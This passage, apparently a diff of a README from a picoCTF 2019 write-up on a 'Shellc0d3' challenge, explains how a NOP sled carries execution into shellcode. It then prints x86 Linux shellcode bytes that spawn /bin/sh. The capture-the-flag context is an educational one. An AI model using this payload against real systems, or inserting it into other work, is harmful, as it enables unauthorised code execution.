0xArch3R/p1c0CTF_2019/Shellc0d3/README.md

 ```
 NOP or N.O.P. may refer to: NOP (code), an assembly language instruction etc. that effectively does nothing at all.
 ```
-and here is our classic shellcode
+So when the instruction pointer lands on the '/x90' instruction it executes it (which does nothing) and makes its way to our shellcode

 ```
 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80